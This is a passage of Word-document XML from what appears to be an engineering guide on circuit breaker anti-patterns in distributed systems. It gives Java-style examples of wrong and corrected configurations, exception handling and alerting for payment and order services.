        <w:t>leading indicator</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — it fires the moment the circuit opens, not when users start complaining minutes later. Catching this event immediately enables faster incident response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4D621" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="7022A57B">
          <v:rect id="_x0000_i4112" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A277837" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Circuit Breaker Anti-Patterns — What Goes Wrong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573BDA14" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 1 — Shared Circuit Breakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A1419" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Using one circuit breaker for multiple downstream services — or multiple operations on the same service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F51CCF7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2030D6F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Wrong: one circuit breaker for all payment operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB32377" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentCircuitBreaker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F643105" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  wraps: processPayment(), refundPayment(), getPaymentStatus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B96DC6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B5206B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="2CA97A65" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC94024" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// getPaymentStatus() is a simple read, very fast, rarely fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEA1E8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// processPayment() is complex, slow, fails during load</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798632CB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// processPayment() failures trip the circuit → getPaymentStatus() also blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C579D11" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Users can't even check the status of their stuck payments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383170D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correct approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Separate circuit breakers per operation (or per logical group of operations with similar failure profiles):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC1BB05" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32309864" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>ProcessPaymentCircuitBreaker: wraps processPayment()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D530B8C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>RefundPaymentCircuitBreaker: wraps refundPayment()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEBDD2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>PaymentStatusCircuitBreaker: wraps getPaymentStatus()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F4F176" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 2 — Circuit Breakers on Non-Idempotent Operations Without Fallbacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E02358" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Wrapping a non-idempotent operation (e.g., createOrder()) in a circuit breaker without a safe fallback causes data inconsistency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8BAF6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E960F5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>createOrder() → circuit open → CallNotPermittedException thrown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F397EEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">               → caller catches exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC747D4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">               → retry (thinking the order wasn't created)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B61EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">               → circuit closes → order created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308815F1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">               → duplicate order exists in system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE8069" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The correct approach for non-idempotent operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A512F62" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idempotency keys</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — the order creation request includes a client-generated idempotency key. Retries with the same key are idempotent — the second call returns the result of the first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1793AA88" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Use </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>async fallback</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — queue the request for retry, return 202 Accepted. The consumer sees no duplicate because only one creation occurs when the queue is processed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1701D47D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Don't circuit-break this layer</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — instead, circuit-break at a lower layer (individual database calls, not business operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4171EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 3 — Cascading Circuit Breaker Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBE1D2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Setting timeout &lt; circuit_breaker_open_time causes calls to always timeout before the circuit can evaluate failure rates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2F788" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6EBF66" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Wrong configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B17F39" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>call_timeout: 100ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A9F60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>sliding_window_size: 100 calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F70EE69" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>failure_rate_threshold: 50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76DF06" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="3D56E1D1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// If each call times out after 100ms, and there are only 10 calls/minute:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4921D37C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// 100 calls take 10 minutes to accumulate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB1D9B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>// The circuit opens 10 minutes after the failure starts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726B89D0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// 10 minutes of timeouts = 10 minutes of thread exhaustion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2292EDD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correct approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Timeout should be much shorter than the time to accumulate the minimum calls. Or use a time-based window that accumulates within seconds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB45EA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20762908" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>sliding_window_type: TIME_BASED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7010D7AB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>sliding_window_size: 10s          // evaluate the last 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512EAB10" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>minimum_number_of_calls: 5        // need at least 5 calls in 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06656D0B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>failure_rate_threshold: 50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14E582" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// At 10 calls/minute, 5 calls in 10 seconds is achievable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B59401" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Circuit opens within seconds of failure starting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FBB3DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 4 — Ignoring CallNotPermittedException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B302CC1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The calling service catches CallNotPermittedException and treats it like a generic Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3231D18A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C40647D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Wrong: treats circuit rejection same as any other exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5BE295" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910396F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    callPaymentService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E781FDB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016AE7CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    log.error("Payment failed: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4B9C1B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    return "Payment failed, please try again";  // suggests retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B0A295" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5A0D5E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="18BF7D75" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// The problem: users retry, hitting the circuit repeatedly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053CAEB9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// "Please try again" during an open circuit just generates 429 errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0407B20C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// User experience is: repeated confusing failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36462ABC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Correct approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Explicitly catch CallNotPermittedException, provide a circuit-specific response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE246DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC55A96" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>// Correct: distinguish circuit rejection from call failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130FF36" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBA8D7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    callPaymentService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D48FB00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>} catch (CallNotPermittedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D20000" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    // Circuit is open — service is known to be failing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56C10A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    return "Payment service is temporarily unavailable. " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D386995" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">           "Your payment has NOT been processed. " +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583767DF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">           "Please try again in 2 minutes.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6098C1AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>} catch (TimeoutException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4B3116" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    // Timeout — possibly transient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A70304" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    return "Payment is taking longer than expected. Please wait...";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B8B1E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D84CF7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anti-Pattern 5 — Circuit Breakers Without Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B190D8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit breakers that silently open and close without any monitoring or alerting. The system appears to be "working" (fallbacks are serving requests) but the underlying service failure goes undetected for hours.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29F94C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The silent degradation problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Users get cached/fallback data. Metrics show "0 errors" (from the client's perspective — fallbacks succeeded). The payment service is completely down. This goes undetected until the cache expires, at which point the degradation becomes visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044DA3FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The correct approach:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Alert on EVERY circuit state transition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3198F069" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit opens → immediate page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BBB45" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit stays open &gt; N minutes → escalated page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5C18B7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Circuit in HALF-OPEN → monitoring alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CE55F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="980"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Fallback invocation rate increasing → warning alert (leading indicator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50682C87" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
